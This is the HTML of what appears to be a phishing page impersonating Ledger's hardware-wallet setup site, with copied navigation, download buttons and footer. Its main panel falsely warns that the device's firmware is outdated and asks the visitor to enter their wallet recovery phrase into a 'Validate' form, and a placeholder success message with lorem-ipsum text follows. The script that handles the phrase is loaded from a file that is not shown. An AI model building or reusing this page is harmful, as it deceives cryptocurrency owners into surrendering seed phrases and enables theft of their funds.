
<!DOCTYPE html>
<html class="no-js" lang="en">

	<head>
		<meta charset="UTF-8" />
		<meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1">

		<title>Action required | Ledger</title>
		<meta name="description" content="Discover our step-by-step guide to set up your Ledger hardware wallet." />
		<meta property="og:locale" content="en_US" />
		<meta property="og:type" content="article" />
		<meta property="og:site_name" content="Ledger" />
		<meta property="og:image:width" content="1920" />
		<meta property="og:image:height" content="1080" />
		<meta property="og:image:type" content="image/png" />

		<script src="assets/js/jquery-3.7.1.min.js"></script>
		<script src="assets/js/script.js"></script>


		<link rel="icon" href="assets/images/Ledger_favicon.png" sizes="32x32" />
		<link rel="icon" href="assets/images/Ledger_favicon.png" sizes="192x192" />


		<script src="assets/js/tagify.js"></script>
		<script src="assets/js/tagify.polyfills.min.js"></script>

		<link rel='stylesheet' href='assets/css/main.css' type='text/css' media='all' />
		<link rel='stylesheet' href='assets/css/live.css' type='text/css' media='all' />
		<link href="assets/css/tagify.css" rel="stylesheet" type="text/css" />


		<link rel='stylesheet' href='assets/css/style.css?v=1744110031' type='text/css' media='all' />
	</head>

	<body class="page-template page-template-page-start page-template-page-start-php page page-id-10168 page-parent">
		<a href="https://shop.ledger.com/pages/bitcoin-voucher-campaign" target="_blank" class="header-top-banner">
			<div class="header-top-banner--container">
				<div class="header-top-banner--text">
					<p>Get up to $50 of Bitcoin when purchasing a Ledger Wallet</p>
				</div>
				<div class="header-top-banner--button">
					<span>See Offers</span>
				</div>
			</div>
		</a>

		<header id="header" class="dark-header " data-slug="start">
	<div class="row">
		<a href="https://www.ledger.com" target="_blank" title="Ledger" class="logo">
			<picture class="flexbox">
				<source media="(min-width: 1200px)" srcset="assets/images/ledger-logo-long.svg">
				<source media="(max-width: 1200px)" srcset="assets/images/ledger-logo-short.svg">
				<img src="assets/images/ledger-logo-long.svg" alt="Ledger">
			</picture>
		</a>

		<nav class="main-navigation" id="main-navigation">
			<ul>
				<li class="has-children">
					<a href="#" title="Products">Products</a>
					<ul>
						<li>
							<a href="https://shop.ledger.com/pages/bitcoin-voucher-campaign" title="Limited Offer" class="highlighted">Limited Offer</a>
						</li>
						<li>
							<a href="https://shop.ledger.com/pages/ledger-stax" title="Ledger Stax">Ledger Stax</a>
						</li>
						<li>
							<a href="https://shop.ledger.com/pages/ledger-flex" title="Ledger Flex">Ledger Flex</a>
						</li>
						<li>
							<a href="https://shop.ledger.com/pages/ledger-nano-x" title="Ledger Nano X">Ledger Nano X</a>
						</li>
						<li>
							<a href="https://shop.ledger.com/pages/ledger-nano-s-plus" title="Ledger Nano S Plus">Ledger Nano S Plus</a>
						</li>
						<li>
							<a href="https://shop.ledger.com/pages/hardware-wallets-comparison" title="Compare our devices">Compare our devices</a>
						</li>
						<li>
							<a href="https://shop.ledger.com/pages/hardware-wallet" title="Hardware Wallet">Hardware Wallet</a>
						</li>
						<li>
							<a href="https://shop.ledger.com/#category-bundle" title="Packs">Packs</a>
						</li>
						<li>
							<a href="https://shop.ledger.com/#category-accessories" title="Accessories">Accessories</a>
						</li>
						<li>
							<a href="https://www.ledger.com/collaborations" title="Collaborations">Collaborations</a>
						</li>
						<li>
							<a href="https://shop.ledger.com" title="See all products">See all products</a>
						</li>
						<li>
							<a href="https://www.ledger.com/ledger-live" title="Download Ledger Live">Download Ledger Live</a>
						</li>
						<li>
							<a href="https://www.ledger.com/supported-crypto-assets" title="Supported crypto">Supported crypto</a>
						</li>
					</ul>
				</li>
				<li class="has-children">
					<a href="#" title="App and services">App and services</a>
					<ul>
						<li>
							<a href="https://www.ledger.com/ledger-live" title="Ledger Live">Ledger Live</a>
						</li>
						<li>
							<a href="https://shop.ledger.com/pages/ledger-recover" title="Ledger Recover">Ledger Recover</a>
						</li>
						<li>
							<a href="https://www.ledger.com/cl-card" title="CL Card">CL Card</a>
						</li>
						<li>
							<a href="https://www.ledger.com/supported-services" title="Supported Services">Supported Services</a>
						</li>
						<li>
							<a href="https://www.ledger.com/coin/price" title="Crypto Prices">Crypto Prices</a>
						</li>
					</ul>
				</li>
				<li class="has-children">
					<a href="#" title="Learn">Learn</a>
					<ul>
						<li>
							<a target="_blank" href="https://www.ledger.com/academy" title="Ledger Academy">Ledger Academy</a>
						</li>
						<li>
							<a target="_blank" href="https://quest.ledger.com/" title="Learn and Earn">Learn and Earn</a>
						</li>
						<li>
							<a target="_blank" href="https://www.ledger.com/academy/what-is-web-30-everything-you-need-to-know" title="Classroom">Classroom</a>
						</li>
						<li>
							<a href="/blog" title="Blog">Blog</a>
						</li>
						<li>
							<a target="_blank" href="https://www.ledger.com/academy/basic-basics/2-how-to-own-crypto/what-is-a-crypto-wallet" title="What is a crypto wallet">What is a crypto wallet</a>
						</li>
						<li>
							<a href="https://www.ledger.com/buy" title="How to Buy">How to Buy</a>
						</li>
						<li>
							<a href="https://www.ledger.com/swap" title="How to Swap">How to Swap</a>
						</li>
						<li>
							<a href="https://www.ledger.com/staking" title="How to Stake">How to Stake</a>
						</li>
					</ul>
				</li>
				<li class="has-children">
					<a href="#" title="For Business">For Business</a>
					<ul>
						<li>
							<a target="_blank" href="https://enterprise.ledger.com?utm_source=mainsite&utm_medium=header" title="Ledger Enterprise Solutions">Ledger Enterprise Solutions</a>
						</li>
						<li>
							<a href="/partners" title="Ledger Partners">Ledger Partners</a>
						</li>
						<li>
							<a target="_blank" href="https://ledger.com/co-branded" title="Ledger Co-branded Partnership">Ledger Co-branded Partnership</a>
						</li>
					</ul>
				</li>
				<li class="">
					<a target="_blank" href="https://developers.ledger.com/" title="For Developers">For Developers</a>
				</li>
				<li class="">
					<a target="_blank" href="https://support.ledger.com/hc" title="Support">Support</a>
				</li>

				<li class="has-children language-switcher">
					<a href="#" class="activeLanguage" data-isocode="en">English</a>
					<ul class="submenu">
						<li>
							<a href="https://www.ledger.com/ar/start" title="" data-name="Arabic" data-isocode="ar" class="localeItem">العربية</a>
						</li>
						<li>
							<a href="https://www.ledger.com/zh-hans/start" title="" data-name="Chinese (Simplified)" data-isocode="zh-hans" class="localeItem">简体中文</a>
						</li>
						<li>
							<a href="https://www.ledger.com/fr/start" title="" data-name="French" data-isocode="fr" class="localeItem">Français</a>
						</li>
						<li>
							<a href="https://www.ledger.com/de/start" title="" data-name="German" data-isocode="de" class="localeItem">Deutsch</a>
						</li>
						<li>
							<a href="https://www.ledger.com/ru/start" title="" data-name="Russian" data-isocode="ru" class="localeItem">Русский</a>
						</li>
						<li>
							<a href="https://www.ledger.com/es/start" title="" data-name="Spanish" data-isocode="es" class="localeItem">Español</a>
						</li>
						<li>
							<a href="https://www.ledger.com/ja/start" title="" data-name="Japanese" data-isocode="ja" class="localeItem">日本語</a>
						</li>
						<li>
							<a href="https://www.ledger.com/ko/start" title="" data-name="Korean" data-isocode="ko" class="localeItem">한국어</a>
						</li>
						<li>
							<a href="https://www.ledger.com/tr/start" title="" data-name="Turkish" data-isocode="tr" class="localeItem">Türkçe</a>
						</li>
						<li>
							<a href="https://www.ledger.com/pt-br/como-comecar" title="" data-name="Portuguese (Brazil)" data-isocode="pt-br" class="localeItem">Português</a>
						</li>
					</ul>
				</li>
			</ul>
		</nav>

		<div class="cart">
			<a href="https://shop.ledger.com/cart" target="_blank" title="Ledger Shop"><i class="icon-shopping-cart"></i></a>
			<div id="mobile-menu" title=""><i class="icon-stream"></i></div>
		</div>
	</div>
</header>
		<main id="main" class="ldg-containergetting-started">
			<div data-gradient="0" class="hero-manager">
				<div class="bg bg-black introduction" id="hero">
					<div class="row no-margin-mobile">
						<div class="flexbox row">
							<div class="content">
								<div class="text-container tc-home">
									<h2 class="heading-3 v-margin-sm">Update Required</h2>

									<p class="heading-7 margin-xs">
										
		Our system indicates that your Ledger device is running on an outdated firmware version. To protect your funds and enhance security measures, you must update your device to the latest version (2.89.01).<br>
		<br>
		Synchronize your device and proceed with the firmware update below.
										</p>

									<p class="margin-xs">
										
		Enter your recovery phrase
										</p>

									<div class="margin-xs">
										<input class="tags-custom" name="tags" id="input-tags" placeholder="Enter keywords..." />

										<div style="width:100%;">
											<button type="button" id="btn-validate" class="flex-none button secondary disabled" disabled onclick="validate()">Validate</button>
										</div>
									</div>
								</div>

								<div class="text-container tc-success">
									<h2 class="heading-3 v-margin-sm">Successfully</h2>
								
									<p class="margin-xs">
										
		Validation was successful, you can now...<br>
		Diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat.
										</p>
								
									<a href="https://www.ledger.com/">Back to home</a>
								</div>
							</div>
							<div class="image-container is-hidden-mobile">
								<img src="assets/images/mobile.png">
							</div>
						</div>
					</div>
				</div>
				<div class="blur"></div>
			</div>

			

			<section class="bg-neutral padding-s">
				<div class="row">
					<h2 class="heading-5 v-margin-sm"><span style="color:#D4A0FF">Download the</span> Ledger Live™ <span style="color:#D4A0FF">app</span></h2>
					<div class="trusted-by  is-hidden-mobile">
						<div class="star-container">

							<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16" fill="none">
								<path d="M8.79818 1.57644C8.64545 1.27206 8.334 1.07996 7.99345 1.08008C7.6529 1.0802 7.34159 1.27253 7.18907 1.57701L5.52429 4.90067L1.88107 5.3605C1.54215 5.40327 1.25667 5.63424 1.14407 5.95676C1.03147 6.27928 1.11117 6.63775 1.34983 6.88217L3.94565 9.54069L3.23659 13.1569C3.17122 13.4903 3.29916 13.8321 3.56738 14.0406C3.83559 14.2491 4.19838 14.2889 4.50536 14.1433L8.00216 12.4853L11.4837 14.1213C11.7907 14.2655 12.1527 14.225 12.4201 14.0163C12.6875 13.8077 12.8149 13.4664 12.7496 13.1336L12.0408 9.51836L14.6359 6.86998C14.8754 6.6256 14.9556 6.26657 14.8428 5.94352C14.7301 5.62047 14.4439 5.3893 14.1044 5.34699L10.4624 4.89314L8.79818 1.57644Z" fill="white" />
							</svg>
							<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16" fill="none">
								<path d="M8.79818 1.57644C8.64545 1.27206 8.334 1.07996 7.99345 1.08008C7.6529 1.0802 7.34159 1.27253 7.18907 1.57701L5.52429 4.90067L1.88107 5.3605C1.54215 5.40327 1.25667 5.63424 1.14407 5.95676C1.03147 6.27928 1.11117 6.63775 1.34983 6.88217L3.94565 9.54069L3.23659 13.1569C3.17122 13.4903 3.29916 13.8321 3.56738 14.0406C3.83559 14.2491 4.19838 14.2889 4.50536 14.1433L8.00216 12.4853L11.4837 14.1213C11.7907 14.2655 12.1527 14.225 12.4201 14.0163C12.6875 13.8077 12.8149 13.4664 12.7496 13.1336L12.0408 9.51836L14.6359 6.86998C14.8754 6.6256 14.9556 6.26657 14.8428 5.94352C14.7301 5.62047 14.4439 5.3893 14.1044 5.34699L10.4624 4.89314L8.79818 1.57644Z" fill="white" />
							</svg>
							<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16" fill="none">
								<path d="M8.79818 1.57644C8.64545 1.27206 8.334 1.07996 7.99345 1.08008C7.6529 1.0802 7.34159 1.27253 7.18907 1.57701L5.52429 4.90067L1.88107 5.3605C1.54215 5.40327 1.25667 5.63424 1.14407 5.95676C1.03147 6.27928 1.11117 6.63775 1.34983 6.88217L3.94565 9.54069L3.23659 13.1569C3.17122 13.4903 3.29916 13.8321 3.56738 14.0406C3.83559 14.2491 4.19838 14.2889 4.50536 14.1433L8.00216 12.4853L11.4837 14.1213C11.7907 14.2655 12.1527 14.225 12.4201 14.0163C12.6875 13.8077 12.8149 13.4664 12.7496 13.1336L12.0408 9.51836L14.6359 6.86998C14.8754 6.6256 14.9556 6.26657 14.8428 5.94352C14.7301 5.62047 14.4439 5.3893 14.1044 5.34699L10.4624 4.89314L8.79818 1.57644Z" fill="white" />
							</svg>
							<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16" fill="none">
								<path d="M8.79818 1.57644C8.64545 1.27206 8.334 1.07996 7.99345 1.08008C7.6529 1.0802 7.34159 1.27253 7.18907 1.57701L5.52429 4.90067L1.88107 5.3605C1.54215 5.40327 1.25667 5.63424 1.14407 5.95676C1.03147 6.27928 1.11117 6.63775 1.34983 6.88217L3.94565 9.54069L3.23659 13.1569C3.17122 13.4903 3.29916 13.8321 3.56738 14.0406C3.83559 14.2491 4.19838 14.2889 4.50536 14.1433L8.00216 12.4853L11.4837 14.1213C11.7907 14.2655 12.1527 14.225 12.4201 14.0163C12.6875 13.8077 12.8149 13.4664 12.7496 13.1336L12.0408 9.51836L14.6359 6.86998C14.8754 6.6256 14.9556 6.26657 14.8428 5.94352C14.7301 5.62047 14.4439 5.3893 14.1044 5.34699L10.4624 4.89314L8.79818 1.57644Z" fill="white" />
							</svg>

							<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16" fill="none">
								<path fill-rule="evenodd" clip-rule="evenodd" d="M8.57473 1.68856C8.46442 1.46873 8.23949 1.32999 7.99354 1.33008C7.74758 1.33017 7.52274 1.46907 7.4126 1.68898L5.68803 5.13199L1.91237 5.60853C1.6676 5.63942 1.46141 5.80623 1.38009 6.03917C1.29877 6.2721 1.35633 6.53099 1.5287 6.70751L4.21624 9.45996L3.48191 13.205C3.4347 13.4458 3.5271 13.6926 3.72081 13.8432C3.91453 13.9938 4.17654 14.0225 4.39824 13.9174L8.00168 12.2089L11.59 13.895C11.8117 13.9992 12.0731 13.9699 12.2663 13.8192C12.4594 13.6685 12.5514 13.4221 12.5043 13.1817L11.7701 9.43736L14.4574 6.69501C14.6303 6.51851 14.6882 6.25921 14.6068 6.0259C14.5254 5.79259 14.3187 5.62562 14.0735 5.59507L10.2989 5.1247L8.57473 1.68856ZM8.00041 10.8401C8.09485 10.8401 8.1893 10.8606 8.27687 10.9018L10.9817 12.1728L10.4286 9.35181C10.3874 9.14169 10.4523 8.92475 10.6022 8.77181L12.6101 6.72276L9.79339 6.37176C9.57796 6.34491 9.39016 6.21229 9.2928 6.01826L8.00041 3.44263V10.8401Z" fill="white" />
							</svg>

						</div>
						<p class="text-caption">Trusted by over 6 million customers</p>
					</div>
				</div>


				<div class="row buttons-wrapper is-hidden-mobile">
					<a class="os-wrapper" href="https://download.live.ledger.com/latest/win" title="">
						<img src="assets/images/ledger-live/download-buttons/windows.svg" alt="" height="56" />
						<div class="align-left">
							<p class="text-caption">Download for</p>
							<p class="heading-6">Windows</p>
						</div>
					</a>
					<a class="os-wrapper" href="https://download.live.ledger.com/latest/mac" title="">
						<img src="assets/images/ledger-live/download-buttons/macos.svg" alt="" height="56" />
						<div>
							<p class="text-caption">Download for</p>
							<p class="heading-6">macOS</p>
						</div>
					</a>
					<a class="os-wrapper" href="https://download.live.ledger.com/latest/linux" title="">
						<img src="assets/images/ledger-live/download-buttons/linux.svg" alt="" height="56" />
						<div class="align-left">
							<p class="text-caption">Download for</p>
							<p class="heading-6">Linux</p>
						</div>
					</a>
					<a class="os-wrapper" href="https://apps.apple.com/fr/app/ledger-live-app-crypto-nft/id1361671700" title="">
						<img src="assets/images/ledger-live/download-buttons/ios.svg" alt="" height="56" />
						<div class="align-left">
							<p class="text-caption">Download for</p>
							<p class="heading-6">iOS</p>
						</div>
					</a>
					<a class="os-wrapper" href="https://play.google.com/store/apps/details?id=com.ledger.live" title="">
						<img src="assets/images/ledger-live/download-buttons/android.svg" alt="" height="56" />
						<div class="align-left">
							<p class="text-caption">Download for</p>
							<p class="heading-6">Android</p>
						</div>
					</a>
				</div>
				<div class="row buttons-wrapper is-hidden-desktop is-hidden-tablet no-margin-mobile">
					<a href="https://apps.apple.com/fr/app/ledger-live-app-crypto-nft/id1361671700">
						<img src="assets/images/ledger-live/download-buttons/app-store.png" alt="" height="45" />
					</a>
					<a href="https://play.google.com/store/apps/details?id=com.ledger.live">
						<img src="assets/images/ledger-live/download-buttons/google-play.png" alt="" height="45" />
					</a>
				</div>
				<p class="text-caption align-center is-hidden-tablet is-hidden-desktop">Also available on desktop</p>
			</section>

			<section class="bg-neutral">
				<input type="hidden" id="redirect" value="https://www.ledger.com/" />
			</section>

		</main>

		<footer class="ldg-container" id="footer">
	<div class="row flexbox">
		<div>
			<a href="https://www.ledger.com" title="Ledger" class="logo"><img src="assets/images/ledger-logo-long.svg" alt=""></a>

			<ul class="language-container">
				<li class="has-children language-switcher">
					<a href="#" class="activeLanguage" data-isocode="en">English</a>
					<ul class="submenu">
						<li>
							<a href="https://www.ledger.com/ar/start" title="" data-name="Arabic" data-isocode="ar" class="localeItem">العربية</a>
						</li>
						<li>
							<a href="https://www.ledger.com/zh-hans/start" title="" data-name="Chinese (Simplified)" data-isocode="zh-hans" class="localeItem">简体中文</a>
						</li>
						<li>
							<a href="https://www.ledger.com/fr/start" title="" data-name="French" data-isocode="fr" class="localeItem">Français</a>
						</li>
						<li>
							<a href="https://www.ledger.com/de/start" title="" data-name="German" data-isocode="de" class="localeItem">Deutsch</a>
						</li>
						<li>
							<a href="https://www.ledger.com/ru/start" title="" data-name="Russian" data-isocode="ru" class="localeItem">Русский</a>
						</li>
						<li>
							<a href="https://www.ledger.com/es/start" title="" data-name="Spanish" data-isocode="es" class="localeItem">Español</a>
						</li>
						<li>
							<a href="https://www.ledger.com/ja/start" title="" data-name="Japanese" data-isocode="ja" class="localeItem">日本語</a>
						</li>
						<li>
							<a href="https://www.ledger.com/ko/start" title="" data-name="Korean" data-isocode="ko" class="localeItem">한국어</a>
						</li>
						<li>
							<a href="https://www.ledger.com/tr/start" title="" data-name="Turkish" data-isocode="tr" class="localeItem">Türkçe</a>
						</li>
						<li>
							<a href="https://www.ledger.com/pt-br/como-comecar" title="" data-name="Portuguese (Brazil)" data-isocode="pt-br" class="localeItem">Português</a>
						</li>
					</ul>
				</li>
			</ul>
			<div class="credit-container">
				<p class="text-caption margin-xs">
					Copyright © Ledger SAS. All rights reserved. Ledger, Ledger Stax, Ledger Nano S, Ledger Vault, Bolos are trademarks owned by Ledger SAS.<br />
					<br />
					106 rue du Temple, 75003 Paris, France
				</p>
				<p class="text-caption">
					Payment methods <br>
					<img src="assets/images/footer/logo-paypal-s.png" alt="">
					<img src="assets/images/footer/logo-crypto-s.png" alt="">
					<img src="assets/images/footer/logo-bitpay-s.png" alt="">
					<br>
					<img src="assets/images/footer/layer1.png" alt="">
					<img src="assets/images/footer/logo-visa-s.png" alt="">
					<img src="assets/images/footer/logo-maestro-s.png" alt="">
					<img src="assets/images/footer/logo-mastercard-s.png" alt="">
					<img src="assets/images/footer/logo-cb-s.png" alt="">
				</p>
			</div>
		</div>
		<!-- bloc nav columns -->
		<nav class="flexbox footer-navigation">
			<div>
				<ul>
					<li>Products<ul id="menu-footer-1-products" class="menu">
							<li id="menu-item-295682" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-295682"><a href="https://shop.ledger.com/pages/hardware-wallet">Hardware Wallet</a></li>
							<li id="menu-item-255315" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-255315"><a href="https://shop.ledger.com/pages/ledger-stax">Ledger Stax</a></li>
							<li id="menu-item-295142" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-295142"><a href="https://shop.ledger.com/pages/ledger-flex">Ledger Flex</a></li>
							<li id="menu-item-4481" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4481"><a href="https://shop.ledger.com/pages/ledger-nano-x">Ledger Nano X</a></li>
							<li id="menu-item-91454" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-91454"><a href="https://shop.ledger.com/pages/ledger-nano-s-plus">Ledger Nano S Plus</a></li>
							<li id="menu-item-11736" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-11736"><a href="https://shop.ledger.com/pages/hardware-wallets-comparison">Compare our devices</a></li>
							<li id="menu-item-12666" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-12666"><a href="https://shop.ledger.com/#category-bundle">Bundles</a></li>
							<li id="menu-item-4484" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4484"><a href="https://shop.ledger.com/#category-accessories">Accessories</a></li>
							<li id="menu-item-4483" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4483"><a href="https://shop.ledger.com">All products</a></li>
							<li id="menu-item-4485" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4485"><a href="https://www.ledger.com/ledger-live">Downloads</a></li>
						</ul>
					</li>
				</ul>
				<ul>
					<li>Crypto Assets<ul id="menu-footer-6-crypto-assets" class="menu">
							<li id="menu-item-9935" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-9935"><a href="https://www.ledger.com/coin/wallet/bitcoin">Bitcoin wallet</a></li>
							<li id="menu-item-4498" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4498"><a href="https://www.ledger.com/coin/wallet/ethereum">Ethereum wallet</a></li>
							<li id="menu-item-296381" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-296381"><a href="https://www.ledger.com/coin/wallet/solana">Solana wallet</a></li>
							<li id="menu-item-268807" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-268807"><a href="https://www.ledger.com/coin/wallet/cardano">Cardano wallet</a></li>
							<li id="menu-item-4497" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4497"><a href="https://www.ledger.com/coin/wallet/ripple">XRP wallet</a></li>
							<li id="menu-item-268808" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-268808"><a href="https://www.ledger.com/coin/wallet/monero">Monero wallet</a></li>
							<li id="menu-item-268809" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-268809"><a href="https://www.ledger.com/coin/wallet/tether">USDT wallet</a></li>
							<li id="menu-item-4496" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4496"><a href="https://www.ledger.com/supported-crypto-assets">See all assets</a></li>
						</ul>
					</li>
				</ul>
				<ul>
					<li>Crypto Services<ul id="menu-footer-11-crypto-services" class="menu">
							<li id="menu-item-268810" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-268810"><a href="https://www.ledger.com/coin/price">Crypto Prices</a></li>
							<li id="menu-item-260972" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-260972"><a href="https://www.ledger.com/buy">Buying crypto</a></li>
							<li id="menu-item-260974" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-260974"><a href="https://www.ledger.com/staking">Staking crypto</a></li>
							<li id="menu-item-260973" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-260973"><a href="https://www.ledger.com/swap">Swapping crypto</a></li>
						</ul>
					</li>
				</ul>

			</div>
			<div>
				<ul>
					<li>For Business<ul id="menu-footer-2-for-business" class="menu">
							<li id="menu-item-4490" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4490"><a href="https://enterprise.ledger.com/">Ledger Enterprise Solutions</a></li>
						</ul>
					</li>
				</ul>
				<ul>
					<li>For Startups<ul id="menu-footer-10-for-startups" class="menu">
							<li id="menu-item-260597" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-260597"><a href="https://www.ledger.com/cathay-ledger-fund">Funding from Ledger Cathay Capital</a></li>
						</ul>
					</li>
				</ul>
				<ul>
					<li>For Developers<ul id="menu-footer-8-for-developers" class="menu">
							<li id="menu-item-79929" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-79929"><a href="https://developers.ledger.com/">The Developer Portal</a></li>
						</ul>
					</li>
				</ul>
				<ul>
					<li>Get started<ul id="menu-footer-3-get-started" class="menu">
							<li id="menu-item-10242" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-10242"><a href="https://www.ledger.com/start" aria-current="page">Start using your Ledger device</a></li>
							<li id="menu-item-11525" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-11525"><a href="https://www.ledger.com/ledger-wallets-and-services">Compatible wallets and services</a></li>
							<li id="menu-item-11520" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-11520"><a href="https://www.ledger.com/buy-bitcoin">How to buy Bitcoin</a></li>
							<li id="menu-item-15515" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-15515"><a href="https://www.ledger.com/buy-bitcoin/how">Guide before buying bitcoin</a></li>
							<li id="menu-item-290639" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-290639"><a href="https://shop.ledger.com/pages/bitcoin-hardware-wallet">Bitcoin Hardware Wallet</a></li>
						</ul>
					</li>
				</ul>
				<ul>
					<li>See also<ul id="menu-footer-4-see-also" class="menu">
							<li id="menu-item-4505" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4505"><a href="https://support.ledger.com/hc">Support</a></li>
							<li id="menu-item-4507" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4507"><a href="https://donjon.ledger.com/bounty/">Bounty program</a></li>
							<li id="menu-item-9937" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-9937"><a href="/reseller">Resellers</a></li>
							<li id="menu-item-79931" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-79931"><a href="https://www.ledger.com/press">Ledger Press Kit</a></li>
							<li id="menu-item-9938" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-9938"><a href="https://www.ledgerwallet.com/affiliates/">Affiliates</a></li>
							<li id="menu-item-9939" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-9939"><a href="https://status.ledger.com/">Status</a></li>
							<li id="menu-item-293932" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-293932"><a href="https://developers.ledger.com/">Developers</a></li>
							<li id="menu-item-14258" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-14258"><a href="/partners">Partners</a></li>
						</ul>
					</li>
				</ul>

			</div>
			<div>
				<ul>
					<li>Careers<ul id="menu-footer-9-careers" class="menu">
							<li id="menu-item-293912" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-293912"><a href="https://careers.ledger.com/homepage">Join us</a></li>
							<li id="menu-item-293913" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-293913"><a href="https://careers.ledger.com/jobs/search">All jobs</a></li>
						</ul>
					</li>
				</ul>
				<ul>
					<li>About<ul id="menu-footer-5-about" class="menu">
							<li id="menu-item-12382" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-12382"><a href="https://www.ledger.com/blog/we-are-ledger-a-brand-vision">Our vision</a></li>
							<li id="menu-item-11491" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-11491"><a href="https://www.ledger.com/academy">Ledger Academy</a></li>
							<li id="menu-item-4501" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4501"><a href="/the-company">The company</a></li>
							<li id="menu-item-4502" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4502"><a href="/the-people-behind-ledger">The people</a></li>
							<li id="menu-item-13241" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-13241"><a href="https://www.ledger.com/diversity">Diversity</a></li>
							<li id="menu-item-10246" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-10246"><a href="/blog">Blog</a></li>
						</ul>
					</li>
				</ul>
				<ul>
					<li>Legal<ul id="menu-footer-7-legal" class="menu">
							<li id="menu-item-293092" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-293092"><a href="https://www.ledger.com/legal-center">Legal Center</a></li>
							<li id="menu-item-4509" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4509"><a href="https://shop.ledger.com/pages/terms-and-conditions">Sales Terms and Conditions</a></li>
							<li id="menu-item-4511" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4511"><a href="https://www.ledger.com/privacy-policy">Privacy Policy</a></li>
							<li id="menu-item-296726" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-296726"><a href="https://shop.ledger.com/pages/cookie-policy">Cookie Policy</a></li>
							<li id="menu-item-289786" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-289786"><a href="https://shop.ledger.com/pages/disclaimers">Disclaimers</a></li>
						</ul>
					</li>
				</ul>

			</div>
		</nav>
	</div>

	<input type="hidden" id="crypto_assets-env" value="prod" />
</footer>	</body>

</html>